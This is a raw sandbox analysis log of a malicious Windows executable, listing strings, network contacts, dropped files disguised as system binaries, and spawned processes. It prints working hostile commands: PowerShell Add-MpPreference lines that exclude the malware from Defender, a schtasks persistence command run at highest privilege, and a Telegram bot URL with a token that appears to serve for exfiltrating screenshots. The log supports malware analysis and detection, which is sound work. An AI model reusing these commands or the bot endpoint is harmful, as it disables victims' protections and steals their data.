                            Source: LzmJLVB41K.exe, 00000000.00000002.2317415520.00000000036D9000.00000004.00000800.00020000.00000000.sdmp, LzmJLVB41K.exe, 00000000.00000002.2317415520.00000000031BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2450393544.0000019B542D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2439053732.0000024117FE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2438216761.0000027736251000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2433495607.0000019BADC01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2446559445.000001E45C211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: powershell.exe, 00000022.00000002.2447636860.0000016462881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameP
                            Source: powershell.exe, 00000022.00000002.2447636860.0000016462AA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2450393544.0000019B544F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2439053732.0000024118207000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2438216761.0000027736478000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2433495607.0000019BADE29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2446559445.000001E45C462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                            Source: powershell.exe, 0000002B.00000002.2446559445.000001E45C462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                            Source: powershell.exe, 00000022.00000002.2447636860.0000016462881000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2450393544.0000019B542D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2439053732.0000024117FE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2438216761.0000027736251000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2433495607.0000019BADC01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2446559445.000001E45C211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                            Source: LzmJLVB41K.exe, 00000000.00000002.2317415520.00000000033F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                            Source: LzmJLVB41K.exe, 00000000.00000002.2309885143.00000000015A2000.00000002.00000001.01000000.00000000.sdmp, LzmJLVB41K.exe, 00000000.00000002.2317415520.00000000033F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                            Source: LzmJLVB41K.exe, 00000000.00000002.2317415520.00000000033F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7520842495:AAGp6iR-yxPgcux3oLWODyICGAWeVDY-0VQ/sendPhotoX
                            Source: powershell.exe, 0000002B.00000002.3722297337.000001E46C287000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                            Source: powershell.exe, 0000002B.00000002.3722297337.000001E46C287000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                            Source: powershell.exe, 0000002B.00000002.3722297337.000001E46C287000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                            Source: powershell.exe, 0000002B.00000002.2446559445.000001E45C462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                            Source: LzmJLVB41K.exe, 00000000.00000002.2317415520.00000000031BD000.00000004.00000800.00020000.00000000.sdmp, LzmJLVB41K.exe, 00000000.00000002.2317415520.00000000037B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io
                            Source: LzmJLVB41K.exe, 00000000.00000002.2309885143.00000000015A2000.00000002.00000001.01000000.00000000.sdmp, LzmJLVB41K.exe, 00000000.00000002.2317415520.00000000031BD000.00000004.00000800.00020000.00000000.sdmp, LzmJLVB41K.exe, 00000000.00000002.2317415520.00000000037B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/country
                            Source: LzmJLVB41K.exe, 00000000.00000002.2309885143.00000000015A2000.00000002.00000001.01000000.00000000.sdmp, LzmJLVB41K.exe, 00000000.00000002.2317415520.00000000031BD000.00000004.00000800.00020000.00000000.sdmp, LzmJLVB41K.exe, 00000000.00000002.2317415520.00000000037B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/ip
                            Source: powershell.exe, 00000022.00000002.3739159881.00000164728F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.3784312347.0000019B64346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.3723381092.0000024128057000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.3741199181.00000277462C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.3637871775.0000019BBDC77000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.3722297337.000001E46C287000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                            Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.6:49726 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49739 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.6:49990 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49993 version: TLS 1.2
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeFile created: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exeJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeFile created: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exe\:Zone.Identifier:$DATAJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeFile created: C:\Windows\Vss\Writers\Application\94dd0fcc3d3f01Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSC7E7B7A5EED54F4581A1AD8A9D40FA45.TMPJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSC7E7B7A5EED54F4581A1AD8A9D40FA45.TMPJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeCode function: 0_2_00007FFD348C0D780_2_00007FFD348C0D78
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeCode function: 0_2_00007FFD348C13250_2_00007FFD348C1325
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeCode function: 0_2_00007FFD34CBAF6E0_2_00007FFD34CBAF6E
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeCode function: 8_2_00007FFD348B0D788_2_00007FFD348B0D78
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeCode function: 8_2_00007FFD348B13258_2_00007FFD348B1325
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeCode function: 9_2_00007FFD348913259_2_00007FFD34891325
                            Source: C:\Recovery\ctfmon.exeCode function: 22_2_00007FFD3488132522_2_00007FFD34881325
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeCode function: 32_2_00007FFD348B177132_2_00007FFD348B1771
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeCode function: 32_2_00007FFD3488132532_2_00007FFD34881325
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeCode function: 32_2_00007FFD34890B1632_2_00007FFD34890B16
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeCode function: 32_2_00007FFD3489000032_2_00007FFD34890000
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeCode function: 32_2_00007FFD348910A932_2_00007FFD348910A9
                            Source: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exeCode function: 51_2_00007FFD348A0D7851_2_00007FFD348A0D78
                            Source: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exeCode function: 51_2_00007FFD348A132551_2_00007FFD348A1325
                            Source: C:\Recovery\ctfmon.exeCode function: 54_2_00007FFD348D177154_2_00007FFD348D1771
                            Source: C:\Recovery\ctfmon.exeCode function: 54_2_00007FFD348A0D7854_2_00007FFD348A0D78
                            Source: C:\Recovery\ctfmon.exeCode function: 54_2_00007FFD348A132554_2_00007FFD348A1325
                            Source: C:\Recovery\ctfmon.exeCode function: 54_2_00007FFD348B0B1654_2_00007FFD348B0B16
                            Source: C:\Recovery\ctfmon.exeCode function: 54_2_00007FFD348B000054_2_00007FFD348B0000
                            Source: C:\Recovery\ctfmon.exeCode function: 54_2_00007FFD348B10A954_2_00007FFD348B10A9
                            Source: C:\Recovery\ctfmon.exeCode function: 54_2_00007FFD348B178E54_2_00007FFD348B178E
                            Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\KlfRTWYv.log 7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                            Source: LzmJLVB41K.exe, 00000000.00000002.2309885143.00000000015A2000.00000002.00000001.01000000.00000000.sdmpBinary or memory string: OriginalFilenameBzUOsUELloh7lcyuhpXTcoPR5FGxF70O4 vs LzmJLVB41K.exe
                            Source: LzmJLVB41K.exe, 00000000.00000000.2160562752.00000000009E2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs LzmJLVB41K.exe
                            Source: LzmJLVB41K.exe, 00000000.00000002.2390828260.000000001B99B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs LzmJLVB41K.exe
                            Source: LzmJLVB41K.exe, 00000000.00000002.2393161210.000000001C03C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs LzmJLVB41K.exe
                            Source: LzmJLVB41K.exe, 00000020.00000002.2827540581.0000000003070000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs LzmJLVB41K.exe
                            Source: LzmJLVB41K.exe, 00000020.00000002.2827540581.00000000030BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs LzmJLVB41K.exe
                            Source: LzmJLVB41K.exe, 00000021.00000002.2832265084.000000000282E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs LzmJLVB41K.exe
                            Source: LzmJLVB41K.exe, 00000021.00000002.2832265084.00000000027E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs LzmJLVB41K.exe
                            Source: LzmJLVB41K.exe, 00000021.00000002.2832265084.00000000028AC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs LzmJLVB41K.exe
                            Source: LzmJLVB41K.exe, 00000021.00000002.2832265084.00000000027F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs LzmJLVB41K.exe
                            Source: LzmJLVB41K.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs LzmJLVB41K.exe
                            Source: LzmJLVB41K.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                            Source: LzmJLVB41K.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: fontdrvhost.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: fozAQGvSmfTQIywuzSgk.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: ctfmon.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: fozAQGvSmfTQIywuzSgk.exe0.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: LzmJLVB41K.exe, BsRfmRdfV3IS2HGBuC2.csCryptographic APIs: 'CreateDecryptor'
                            Source: LzmJLVB41K.exe, BsRfmRdfV3IS2HGBuC2.csCryptographic APIs: 'CreateDecryptor'
                            Source: LzmJLVB41K.exe, BsRfmRdfV3IS2HGBuC2.csCryptographic APIs: 'CreateDecryptor'
                            Source: LzmJLVB41K.exe, BsRfmRdfV3IS2HGBuC2.csCryptographic APIs: 'CreateDecryptor'
                            Source: classification engineClassification label: mal100.spre.troj.expl.evad.winEXE@49/66@3/2
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeFile created: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeFile created: C:\Users\user\Desktop\QMBYhgjh.logJump to behavior
                            Source: C:\Recovery\ctfmon.exeMutant created: NULL
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6520:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7452:120:WilError_03
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-aLGXjVx6R1ZoFPmWBKbs
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4600:120:WilError_03
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeFile created: C:\Users\user\AppData\Local\Temp\4zgfavxtJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Kg1DnkFEGg.bat"
                            Source: LzmJLVB41K.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: LzmJLVB41K.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeFile read: C:\Users\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: LzmJLVB41K.exeReversingLabs: Detection: 65%
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeFile read: C:\Users\user\Desktop\LzmJLVB41K.exeJump to behavior
                            Source: unknownProcess created: C:\Users\user\Desktop\LzmJLVB41K.exe "C:\Users\user\Desktop\LzmJLVB41K.exe"
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fozAQGvSmfTQIywuzSgkf" /sc MINUTE /mo 8 /tr "'C:\Recovery\fozAQGvSmfTQIywuzSgk.exe'" /rl HIGHEST /f
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4zgfavxt\4zgfavxt.cmdline"
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6584.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC80740084700441B098BDC166533478DB.TMP"
                            Source: unknownProcess created: C:\Recovery\fozAQGvSmfTQIywuzSgk.exe C:\Recovery\fozAQGvSmfTQIywuzSgk.exe
                            Source: unknownProcess created: C:\Recovery\fozAQGvSmfTQIywuzSgk.exe C:\Recovery\fozAQGvSmfTQIywuzSgk.exe
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a4ouxeif\a4ouxeif.cmdline"
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6A18.tmp" "c:\Windows\System32\CSC7E7B7A5EED54F4581A1AD8A9D40FA45.TMP"
                            Source: unknownProcess created: C:\Recovery\ctfmon.exe C:\Recovery\ctfmon.exe
                            Source: unknownProcess created: C:\Recovery\ctfmon.exe C:\Recovery\ctfmon.exe
                            Source: unknownProcess created: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe "C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe"
                            Source: unknownProcess created: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe "C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe"
                            Source: unknownProcess created: C:\Users\user\Desktop\LzmJLVB41K.exe C:\Users\user\Desktop\LzmJLVB41K.exe
                            Source: unknownProcess created: C:\Users\user\Desktop\LzmJLVB41K.exe C:\Users\user\Desktop\LzmJLVB41K.exe
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\fozAQGvSmfTQIywuzSgk.exe'
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ctfmon.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\SciTE\api\fozAQGvSmfTQIywuzSgk.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe'
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\LzmJLVB41K.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Kg1DnkFEGg.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: unknownProcess created: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exe "C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exe"
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe "C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe"
                            Source: unknownProcess created: C:\Recovery\ctfmon.exe "C:\Recovery\ctfmon.exe"
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4zgfavxt\4zgfavxt.cmdline"Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a4ouxeif\a4ouxeif.cmdline"Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\fozAQGvSmfTQIywuzSgk.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ctfmon.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\SciTE\api\fozAQGvSmfTQIywuzSgk.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fozAQGvSmfTQIywuzSgkf" /sc MINUTE /mo 8 /tr "'C:\Recovery\fozAQGvSmfTQIywuzSgk.exe'" /rl HIGHEST /fJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\LzmJLVB41K.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Kg1DnkFEGg.bat" Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6584.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC80740084700441B098BDC166533478DB.TMP"Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6A18.tmp" "c:\Windows\System32\CSC7E7B7A5EED54F4581A1AD8A9D40FA45.TMP"Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe "C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe"
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: apphelp.dllJump to behavior
